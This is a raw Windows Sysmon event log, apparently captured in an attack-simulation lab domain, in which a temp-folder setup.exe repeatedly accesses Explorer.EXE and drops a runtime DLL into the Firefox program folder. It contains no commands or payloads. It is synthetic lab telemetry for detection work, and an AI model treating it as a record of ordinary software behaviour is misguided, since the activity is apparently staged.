13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll2021-01-18 13:59:52.224 10341000x800000000000000014522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.224{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
